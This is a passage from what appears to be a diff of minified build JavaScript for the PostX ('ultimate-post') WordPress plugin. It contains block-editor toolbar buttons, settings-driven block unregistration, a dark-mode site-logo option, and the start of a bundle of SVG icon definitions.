e=[];!1===window.bindCssPostX&&(jQuery(".block-editor-block-list__block").each((function(){jQuery(this).data("type").includes("ultimate-post/")&&e.push({id:jQuery(this).data("block"),name:jQuery(this).data("type")})})),e.length>0&&(0,s.V)(e))}))}),0)};p((function(){document.querySelector(".widgets-php")?f():document.querySelector(".block-editor-page")&&(d((()=>{const{isSavingPost:e,isAutosavingPost:t,isPreviewingPost:l,isEditedPostSaveable:o}=wp.data.select("core/editor");null!=wp.data.select("core/editor")&&(o()&&!l()&&(h=!1,window.bindCssPostX=!1),t()?l()&&0==window.bindCssPostX&&(window.bindCssPostX=!0,(0,s.R)({handleBindCss:!0,preview:!0})):e()&&0==window.bindCssPostX&&(window.bindCssPostX=!0,h=!0,(0,s.R)({handleBindCss:!1,preview:!1}))),jQuery('[aria-controls="ultp-postx-settings:postx-settings"] span[arial-label="Go Back"]').css("display","none")})),"yes"!=ultp_data.hide_import_btn&&(()=>{const e=d((()=>{let l;if(wp.data.select("core/edit-site")?(l=document.querySelector(".editor-header__toolbar"),l||(l=window.document.querySelector(".edit-site-header-edit-mode__center"))):(l=document.querySelector(".editor-header__toolbar"),l||(l=document.querySelector(".edit-post-header__toolbar")),l||(l=document.querySelector(".edit-post-header-toolbar"))),!l)return;const i=`<button id="UltpChatGPTButton" class="ultp-popup-button" aria-label="ChatGPT"><img class="ultp-popup-bar-image" src="${ultp_data.url+"assets/img/addons/ChatGPT.svg"}">${__("ChatGPT","ultimate-post")}</button>`,n=document.createElement("div");n.className="toolbar-insert-layout";const r=`${"true"==ultp_data.settings.ultp_chatgpt?i:""}<button id="UltpInsertButton" class="ultp-popup-button" aria-label="Insert Layout">\n        <img class="ultp-popup-bar-image" src="${ultp_data.url+"assets/img/logo-sm.svg"}">\n                        ${["singular","archive","header","footer","404"].includes(ultp_data.archive)?__("Builder Library","ultimate-post"):__("Template Kits","ultimate-post")}\n                    </button>`;n.innerHTML=r,l.appendChild(n),document.getElementById("UltpInsertButton")?.addEventListener("click",(function(){const e=document.createElement("div");e.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(e),g((0,t.createElement)(o.Z,{isShow:!0}),e),document.body.classList.add("ultp-popup-open")})),document.getElementById("UltpChatGPTButton")?.addEventListener("click",(function(){const e=document.createElement("div");e.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(e),g((0,t.createElement)(a.Z,{isShow:!0,fromEditPostToolbar:!0}),e),document.body.classList.add("ultp-popup-open")})),e()}))})());const e={heading:"heading",image:"image",news_ticker:"news-ticker",post_grid_1:"post-grid-1",post_grid_2:"post-grid-2",post_grid_3:"post-grid-3",post_grid_4:"post-grid-4",post_grid_5:"post-grid-5",post_grid_6:"post-grid-6",post_grid_7:"post-grid-7",post_list_1:"post-list-1",post_list_2:"post-list-2",post_list_3:"post-list-3",post_list_4:"post-list-4",post_module_1:"post-module-1",post_module_2:"post-module-2",post_slider_1:"post-slider-1",post_slider_2:"post-slider-2",taxonomy:"ultp-taxonomy",wrapper:"wrapper",advanced_list:"advanced-list",button_group:"button-group",row:"row",advanced_search:"advanced-search",dark_light:"dark-light",social_icons:"social-icons",menu:"menu",star_ratings:"star-rating",accordion:"accordion",tabs:"tabs",gallery:"gallery",youtube_gallery:"youtube-gallery"};Object.keys(e).forEach((t=>{ultp_data.settings?.hasOwnProperty(t)&&"yes"!=ultp_data.settings[t]&&u("ultimate-post/"+e[t])}));const l={builder_advance_post_meta:"advance-post-meta",builder_archive_title:"archive-title",builder_author_box:"author-box",builder_post_next_previous:"next-previous",builder_post_author_meta:"post-author-meta",builder_post_breadcrumb:"post-breadcrumb",builder_post_category:"post-category",builder_post_comment_count:"post-comment-count",builder_post_comments:"post-comments",builder_post_content:"post-content",builder_post_date_meta:"post-date-meta",builder_post_excerpt:"post-excerpt",builder_post_featured_image:"post-featured-image",builder_post_reading_time:"post-reading-time",builder_post_social_share:"post-social-share",builder_post_tag:"post-tag",builder_post_title:"post-title",builder_post_view_count:"post-view-count"};"ultp_builder"==ultp_data.post_type?Object.keys(l).forEach((e=>{ultp_data.settings?.hasOwnProperty(e)&&"yes"!=ultp_data.settings[e]&&u("ultimate-post/"+l[e])})):Object.keys(l).forEach((e=>{u("ultimate-post/"+l[e])})),ultp_data.settings?.hasOwnProperty("ultp_table_of_content")&&"true"!=ultp_data.settings.ultp_table_of_content&&u("ultimate-post/table-of-content")})),b("blocks.registerBlockType","ultimate-post/ultp-site-logo-attributes",(function(e){if("core/site-logo"==e.name){const t={ultpEnableDarkLogo:{type:"boolean",default:!1},ultpdarkLogo:{type:"object"}};e.attributes={...e.attributes,...t}}return e})),b("editor.BlockEdit","core/site-logo",(function(l){const o=[];return function(a){const{attributes:{ultpEnableDarkLogo:r,ultpdarkLogo:s,className:p},setAttributes:c}=a;if("core/site-logo"==a.name){const e=o.indexOf(a.clientId);r&&e<0?o.push(a.clientId):e>-1&&o.splice(e,1)}return[(0,t.createElement)(l,(0,e.Z)({key:a?.clientId},a)),a.isSelected&&"core/site-logo"==a.name&&(0,t.createElement)(v,null,(0,t.createElement)("div",{className:"ultp-dark-logo-control"},(0,t.createElement)(n.Z,{label:__("Enable Dark Mode Logo(PostX)","ultimate-post"),value:r,onChange:e=>{a.setAttributes({ultpEnableDarkLogo:e,className:e?(p||"")+" ultp-dark-logo":p?.replaceAll("ultp-dark-logo","")})}}),r&&(0,t.createElement)(i.Z,{label:__("Upload Dark Mode Image","ultimate-post"),multiple:!1,type:["image"],panel:!0,value:null!=s?s:{url:ultp_data.dark_logo},onChange:e=>{var t;t=e,wp.apiFetch({path:"/ultp/v2/init_site_dark_logo",method:"POST",data:{wpnonce:ultp_data.security,logo:t}}).then((e=>{})),c({ultpdarkLogo:t}),o.length&&m&&o.forEach((e=>{m("core/block-editor").updateBlockAttributes(e,{ultpdarkLogo:t})}))}})))]}}),0),y("ultp-postx-settings",{render:()=>(0,t.createElement)(r.Z,null)})})()})();
\ No newline at end of file
+(()=>{var e={34528:(e,t,l)=>{"use strict";l.d(t,{c:()=>a});var o=l(67294);const a={add_plus_shopping_cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.862 3.76A1.75 1.75 0 0 0 4.13 2.25H2a.75.75 0 0 0 0 1.5h2.129a.25.25 0 0 1 .247.216l1.762 12.773c.059.427.27.8.572 1.069a2.5 2.5 0 1 0 4.33.442h5.17a2.5 2.5 0 1 0 2.29-1.5H7.871a.25.25 0 0 1-.247-.216l-.183-1.32 12.36-1.068a1.75 1.75 0 0 0 1.573-1.433l1.152-6.403a1.75 1.75 0 0 0-1.722-2.06H5.93l-.068-.49ZM7.75 19.25a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm9.75 0a1 1 0 1 1 2 0 1 1 0 0 1-2 0Zm-4.505-7.75v-1.245H11.75a.75.75 0 0 1 0-1.5h1.245V7.5a.75.75 0 0 1 1.5 0v1.255h1.255a.75.75 0 0 1 0 1.5h-1.255V11.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"})),android_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20 10.25a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75Zm-16 0a.75.75 0 0 1 .75.75v6a.75.75 0 0 1-1.5 0v-6a.75.75 0 0 1 .75-.75ZM8.05 1.4a.75.75 0 0 0-.15 1.05l1.153 1.537A6.249 6.249 0 0 0 5.75 9.5v.5h12.5v-.5a6.249 6.249 0 0 0-3.303-5.513L16.1 2.45a.75.75 0 1 0-1.2-.9l-1.41 1.879a6.266 6.266 0 0 0-2.98 0L9.1 1.55a.75.75 0 0 0-1.05-.15ZM9.74 8a.75.75 0 0 1 .75-.75h.01a.75.75 0 0 1 0 1.5h-.01A.75.75 0 0 1 9.74 8Zm3.75-.75a.75.75 0 0 0 0 1.5h.01a.75.75 0 0 0 0-1.5h-.01Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M5.75 11.5V17a2.75 2.75 0 0 0 2.75 2.75h.25V22a.75.75 0 0 0 1.5 0v-2.25h4V22a.75.75 0 0 0 1.5 0v-2.261A2.75 2.75 0 0 0 18.25 17v-5.5H5.75Z"})),angry_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM6.25 9.5A.75.75 0 0 1 7 8.75c.549 0 1.303.068 1.982.285.632.202 1.458.619 1.704 1.493.043.152.064.31.064.472 0 .527-.197 1.1-.77 1.322-.493.192-.974-.001-1.25-.237-.277-.238-.62-.793-.262-1.39.044-.074.096-.14.153-.2a2.804 2.804 0 0 0-.095-.031C8.04 10.309 7.45 10.25 7 10.25a.75.75 0 0 1-.75-.75Zm8.768-.465c.678-.217 1.433-.285 1.982-.285a.75.75 0 0 1 0 1.5c-.451 0-1.041.059-1.526.214-.033.01-.065.021-.095.032.057.059.109.125.153.2.359.596.015 1.151-.262 1.389-.276.236-.758.429-1.25.237-.573-.223-.77-.795-.77-1.322 0-.162.021-.32.064-.472.246-.874 1.072-1.291 1.704-1.493Zm-6.347 8.3C9.262 16.153 10.58 15.5 12 15.5c1.42 0 2.738.653 3.33 1.835a.75.75 0 1 0 1.34-.67C15.763 14.847 13.83 14 12 14s-3.762.847-4.67 2.665a.75.75 0 0 0 1.34.67Z",clipRule:"evenodd"})),apple_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.054 8.58c-.123.096-2.287 1.337-2.287 4.095 0 3.191 2.754 4.32 2.836 4.348-.012.069-.437 1.546-1.452 3.051-.904 1.325-1.849 2.647-3.286 2.647s-1.806-.85-3.465-.85c-1.617 0-2.192.878-3.506.878-1.315 0-2.232-1.226-3.286-2.73-1.222-1.768-2.209-4.514-2.209-7.12 0-2.07.655-3.658 1.636-4.735 1-1.097 2.337-1.662 3.664-1.662 1.397 0 2.562.933 3.439.933.834 0 2.136-.989 3.725-.989.602 0 2.767.056 4.19 2.133Zm-4.945-3.904a5.04 5.04 0 0 0 .84-1.467 4.462 4.462 0 0 0 .282-1.528c0-.152-.013-.307-.04-.432-1.07.04-2.342.725-3.109 1.63-.602.697-1.164 1.797-1.164 2.913 0 .168.027.336.04.39.068.013.178.028.287.028.96 0 2.167-.654 2.864-1.534Z"})),arrow_down_bottom_downward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1 6.25a1 1 0 1 0-2 0v6.586l-1.793-1.793a1 1 0 0 0-1.414 1.414l3.5 3.5a1 1 0 0 0 1.414 0l3.5-3.5a1 1 0 0 0-1.414-1.414L13 14.086V7.5Z",clipRule:"evenodd"})),arrow_down_bottom_downward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 3.5a1 1 0 1 1 2 0v14.586l6.793-6.793a1 1 0 1 1 1.414 1.414l-8.5 8.5a1 1 0 0 1-1.414 0l-8.5-8.5a1 1 0 0 1 1.338-1.482l.076.068L11 18.086V3.5Z"})),arrow_down_bottom_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L8.414 17H18a1 1 0 1 1 0 2H6a1 1 0 0 1-1-1V6a1 1 0 0 1 2 0v9.586L17.293 5.293Z"})),arrow_down_bottom_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5.293 5.293a1 1 0 0 1 1.414 0L17 15.586V6a1 1 0 1 1 2 0v12a1 1 0 0 1-1 1H6a1 1 0 1 1 0-2h9.586L5.293 6.707a1 1 0 0 1 0-1.414Z"})),arrow_down_dropdown_maximize_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M18 8.25a.75.75 0 0 1 .53 1.28l-6 6a.75.75 0 0 1-1.06 0l-6-6A.75.75 0 0 1 6 8.25h12Z"})),arrow_left_backward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm-.293 7.957a1 1 0 0 0-1.414-1.414l-3.5 3.5a1 1 0 0 0 0 1.414l3.5 3.5a1 1 0 0 0 1.414-1.414L9.914 13H16.5a1 1 0 1 0 0-2H9.914l1.793-1.793Z",clipRule:"evenodd"})),arrow_left_backward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.293 2.793a1 1 0 1 1 1.414 1.414L5.914 11H20.5a1 1 0 1 1 0 2H5.914l6.793 6.793.068.076a1 1 0 0 1-1.406 1.406l-.076-.068-8.5-8.5a1 1 0 0 1 0-1.414l8.5-8.5Z"})),arrow_left_previous_backward_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M14.47 5.47a.75.75 0 0 1 1.28.53v12a.75.75 0 0 1-1.28.53l-6-6a.75.75 0 0 1 0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 .068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 